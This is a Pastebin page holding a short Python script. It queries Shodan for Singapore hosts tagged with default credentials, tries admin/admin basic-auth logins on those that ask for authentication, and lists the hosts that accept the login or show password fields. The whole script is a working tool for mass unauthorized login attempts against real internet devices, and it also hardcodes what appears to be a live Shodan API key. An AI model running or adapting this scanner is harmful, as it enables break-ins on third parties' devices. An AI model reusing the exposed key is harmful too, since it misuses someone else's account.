Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import shodan
- import requests
- from bs4 import BeautifulSoup
- SHODAN_API_KEY = "2Y5R9scM5dnNIlcNzUQQdzzn14UOwdSF"
- api = shodan.Shodan(SHODAN_API_KEY)
- basicAuthenticatedIps = [];
- passwordFieldIps = [];
- basicAuthenticatedSuccessfulIps = [];
- def tryBasicAuthentication(ip):
- basicAuthenticatedIps.append(ip);
- username = 'admin';
- password = 'admin';
- authenticatedRequest = requests.get(ip, auth=(username, password), verify=False)
- if authenticatedRequest.status_code == 200:
- print ('Status - Login Successful')
- basicAuthenticatedSuccessfulIps.append(ip);
- else:
- print ('Status - Basic Authentication Failed')
- def parseHtml(html_doc):
- soup = BeautifulSoup(html_doc, 'html.parser')
- html_doc_body = soup.body
- if html_doc_body == None:
- return False
- '''
- usernameBoxNames = ['username', 'email']
- for usernameBoxName in usernameBoxNames:
- usernameInputBox = html_doc_body.find('input', attrs={'name':usernameBoxName})
- passwordInputBox = html_doc_body.find('input', attrs={'type':'password'})
- submitButton = html_doc_body.find('input', attrs={'type':'submit'})
- if usernameInputBox != None and passwordInputBox != None and submitButton != None:
- print('Username field is ' + usernameBoxName)
- return True
- '''
- # if the page has passowrd field, then there is chance to authenticate
- passwordInputBox = html_doc_body.find('input', attrs={'type':'password'})
- if passwordInputBox != None:
- return True
- return False
- try:
- results = api.search ('"Default credentials" country:SG')
- print('Results found: %s' % results['total'])
- for result in results['matches']:
- info = api.host(result['ip_str'])
- if info != 'Error: Invalid IP':
- ip = 'http://' + result['ip_str'] + '/'
- try:
- print('Trying to access IP : ' + ip)
- r = requests.get(ip, verify=False, timeout=5)
- if r.status_code == 200:
- print("Parsing html for the page")
- existPasswordField = parseHtml(r.text)
- if existPasswordField :
- passwordFieldIps.append(ip);
- elif r.status_code == 401:
- print("Trying Basic authentication")
- tryBasicAuthentication(ip)
- basicAuthenticatedIps.append(ip)
- except requests.exceptions.ConnectionError:
- pass
- except shodan.APIError:
- print ('Error')
- print("");
- print("===========================================")
- print("List of Ips that was basic authenticated: ")
- print(basicAuthenticatedIps);
- print("");
- print("===========================================")
- print("List of Ips with successful basic authentication: ")
- print(basicAuthenticatedSuccessfulIps);
- print("")
- print("===========================================")
- print("List of Ips that has password field")
- print(passwordFieldIps)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement